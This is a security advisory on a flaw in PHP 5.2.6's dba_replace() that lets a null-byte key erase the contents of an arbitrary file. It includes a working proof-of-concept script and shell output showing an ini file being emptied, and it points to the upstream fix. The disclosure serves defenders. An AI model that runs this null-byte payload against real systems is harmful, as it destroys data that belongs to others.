|
|
|
|
| |
| PHP is "an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly". PHP's dba_replace is a function that allows replacing or insertion of entries, a vulnerability in the function allows attackers to cause the function to destroy arbitrary files. |
| |
Credit:
The information has been provided by Maksymilian Arciemowicz.
|
| |
Vulnerable Systems:
* PHP version 5.2.6
dba_replace() file destruction:
Function dba_replace() does not filter strings keys and/or values. This allows the function to destory arbitrary files (remove their content).
# cat /www/dba.hack.php
<?php
$source=dba_open("/www/about.ini", "wlt", "inifile");
dba_replace("HOME","/www/",$source);
?>
# cat /www/about.ini
PATH=/
CURR=.
HOME=/home/
# php /www/dba.hack.php
# cat /www/about.ini
PATH=/
CURR=.
HOME=/www/
#
Well. But, lets try use:
# cat /www/dba.ham.php
<?php
$source=dba_open("/www/about.ini", "wlt", "inifile");
dba_replace("\0","/www/",$source);
?>
# php /www/dba.ham.php
# cat /www/about.ini
#
Now /www/about.ini, is empty.
Solution:
The vulnerability has been fixed in CVS:
http://cvs.php.net/viewvc.cgi/php-src/NEWS?r1=1.2027.2.547.2.1313&r2=1.2027.2.547.2.1314&
|
|
|
|
|
